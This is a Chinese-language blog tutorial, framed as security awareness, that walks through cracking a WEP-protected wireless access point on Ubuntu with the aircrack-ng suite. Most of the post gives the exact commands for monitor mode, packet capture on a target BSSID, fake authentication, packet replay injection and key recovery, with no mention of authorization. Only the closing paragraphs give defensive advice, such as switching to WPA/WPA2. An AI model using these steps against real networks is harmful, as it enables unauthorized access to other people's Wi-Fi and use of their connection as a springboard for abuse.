你的無線 AP 讓我『上』一下！如何利用 ubuntu 破解無線 AP？

資訊爆炸的時代，資訊安全也日益顯得重要，無線網路的訊號屬於對外無限制散射的，所以在安全性上一定有先天上的缺陷。這篇主要著墨於讓各位瞭解並不需要太多的技術，滲透你我的網路安全是如此的容易，稍微引導一個網路安全概念及習慣的觀念。


既然要在『ubuntu』上，當然要先準備破解無線網路工具，為各位介紹這套『Aircrack-ng』，『Aircrack-ng』工具包有很多工具，工具主要有以下幾個：

『airmon-ng』處理網卡工作模式
『airodump-ng』抓包
『aircrack-ng』破解
『aireplay-ng』發包、干擾

有人可能在下載的時候會遇到防毒軟體警告，筆者是使用『Avira』小紅傘 10 也有提示警告，一般來說大家使用的『註冊機』、『破解』軟體，大多是屬於攻擊型軟體，防毒軟體一般來說都會將之列為危險警告，如果各位還是有不放心的疑慮，可以看看本文就好了！這邊附上一則連結：『Aircrack-ng - 掃描病毒和間諜軟體結果』

進入主題開始

在終端機中輸入以下指令安裝 aircrack-ng

sudo apt-get install aircrack-ng

接著在終端機中輸入以下指令啟動無線網卡的監控模式。註（1）

sudo airmon-ng start wlan0

查看有哪些 AP 在附近，在終端機中輸入以下指令，然後『Ctrl』+『C』退出，保留終端機別關閉

sudo airodump-ng mon0

再來進行抓包，開啟另一個終端機輸入以下。註（2）

sudo airodump-ng -c 6 –bssid 11:22:33:44:55:66 -w  wep mon0

＊ 說明：
『c』後面的 6 是要破解 AP 的工作頻道。
『bissid』後面的 11:22:33:44:55:66 是要破解 AP 的 MAC 位址。
『w』後面是抓取的數據包文件名，文件名隨意但要記得，後面要用到。
註（1） 可以查看正在工作的 AP 頻道（ch）和 MAC 位址

再來輸入破解與目標 AP 建立虛擬連接，另開一個終端機輸入以下指令

sudo aireplay-ng -1 0 -a 11:22:33:44:55:66 -h aa:bb:cc:dd:ee:ff  mon0

＊ 說明：
『h』後面的 aa:bb:cc:dd:ee:ff 是自己無線網卡的 MAC 位置，如不清楚可以在終端機輸入 ifconfig 查看

此時順利的話，應該成功建立虛擬連接後終端機中輸入以下，輸入破解為了加快抓包的速度

sudo aireplay-ng -2 -F -p 0841 -c ff:ff:ff:ff:ff:ff -b 11:22:33:44:55:66 -h aa:bb:cc:dd:ee:ff mon0

收集 15000（建議） 個以上的數據後，另開一個終端機輸入進行解碼。

sudo aircrack-ng wep*.cap

＊注意：這裡輸入的文件名要和註（2）一致。

 休息一下等破解出密碼後在終端中輸入最後動作，關閉監控模式，否則無線網卡還會持續向目標 AP 進行輸入。

sudo airmon-ng stop mon0

其實這種方法算是比較『溫和』的，還有『機車』的玩法主動送出連線封包，因為內容有暴力血腥成份，所以....改天再說囉！

整個過程中比較花時間的就是收集可供計算比對數據的過程，如果面對使用率高的 AP的話，整個時間基本上還可以縮短。無線加密的『WEP』就這樣給它解開了，根據『Aircrack-ng』的說明中提到『WPA/WPA2』也是可以被破解的。

筆者這種外行人很單純的抓現成的程式稍微閱讀一下說明文件，直接 Run 一下就成功破解輕易搞定，面對各大作業系統一窩蜂往雲端飛奔而去，而正在使用無線網路的你該怎麼能放心個人情資的外洩呢？

到這應該有些人的想法認為『我家裡的 AP 讓別人用又沒關係，不要佔用過多的頻寬影響到我正常上網就好了。』。基本上對方如果只是單純『借用一下！』，那真的該謝天謝地了！如果 AP 被『閒雜人等』借用了，便可以藉由你的 IP 當作一個出口的跳板（亞洲聞名世界的殭屍電腦就是經由跳板攻擊）來搞些見光死的事（盜帳號變賣虛寶、亂發言（信）、散播病毒、盜用他人網路銀行帳號、上傳色情圖片到討論區等等），等到出事偵後九隊、電信警察、管區警察根據來源 IP 追查到你這時，大家還會這麼率性的沒關係嗎？

檢查下自己的 AP 設定吧！如果 AP 採用 WEP 加密，筆者真的建議改為 WPA/WPA2 ，同時在 AP上設定可存取的 MAC Address 清單限制，內心會稍微........安全一點！

對這方面意尤未盡還有興趣的朋友，可以上網搜尋更多相關資料，在此筆者就不多作贅述。也歡迎大家可以投稿發表討論！


===============================================
軟體名稱：Aircrack-ng
官方網站：http://www.aircrack-ng.org/doku.php?id=airmon-ng
語言種類：英文

★數位夢想★ 由 Redwolf 製作以 創用CC 姓名標示-相同方式分享 3.0 台灣 授權條款 釋出